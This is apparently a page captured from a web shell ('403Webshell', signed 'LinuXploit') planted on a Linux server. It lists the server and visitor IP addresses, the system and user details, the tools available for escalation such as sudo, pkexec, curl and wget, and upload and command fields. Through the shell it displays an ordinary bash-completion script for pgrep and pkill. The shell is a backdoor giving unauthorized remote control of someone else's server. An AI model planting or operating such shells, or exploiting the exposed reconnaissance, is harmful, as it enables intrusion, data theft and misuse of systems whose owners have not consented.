403Webshell
Server IP : 37.9.174.138  /  Your IP : 216.73.216.117
Web Server : Apache
System : Linux vps6.backend.sk 6.12.100+deb13-amd64 #1 SMP PREEMPT_DYNAMIC Debian 6.12.100-1 (2026-07-30) x86_64
User : ftpuser ( 1001)
PHP Version : 8.4.24
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : OFF  |  Sudo : ON  |  Pkexec : ON
Directory :  /usr/share/bash-completion/completions/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /usr/share/bash-completion/completions/pgrep
# pgrep(1) and pkill(1) completion                         -*- shell-script -*-

_comp_cmd_pgrep()
{
    local cur prev words cword comp_args
    _comp_initialize -- "$@" || return

    local noargopts='!(-*|*[cdgJMNstTzFGPuU]*)'
    # shellcheck disable=SC2254
    case $prev in
        --delimiter | --pgroup | --session | --terminal | -${noargopts}[cdgJMNstTz])
            return
            ;;
        --signal)
            _comp_compgen_signals
            return
            ;;
        --pidfile | -${noargopts}F)
            _comp_compgen_filedir
            return
            ;;
        --group | -${noargopts}G)
            _comp_compgen_gids
            return
            ;;
        -j)
            _comp_compgen -- -W 'any none'
            return
            ;;
        --parent | --ns | -${noargopts}P)
            _comp_compgen_pids
            return
            ;;
        --euid | --uid | -${noargopts}[uU])
            _comp_compgen_uids
            return
            ;;
        --nslist)
            _comp_compgen -c "${cur##*,}" split -F $' \t\n,' -- "$(
                "$1" --help 2>&1 |
                    command sed -ne 's/^[[:space:]]*Available namespaces://p'
            )" &&
                _comp_delimited , -W '"${COMPREPLY[@]}"'
            return
            ;;
    esac

    if [[ $cur == -* ]]; then
        _comp_compgen_help ||
            _comp_compgen_usage - <<<"$("$1" --usage 2>&1 |
                command sed -e "s/\[-signal\]//" -e "s/\[-SIGNAL\]//")"
        [[ $cword -eq 1 && $1 == *pkill ]] && _comp_compgen -a signals -
        return
    fi

    _comp_compgen_pnames -s
} &&
    complete -F _comp_cmd_pgrep pgrep pkill

# ex: filetype=sh

Youez - 2016 - github.com/yon3zu
LinuXploit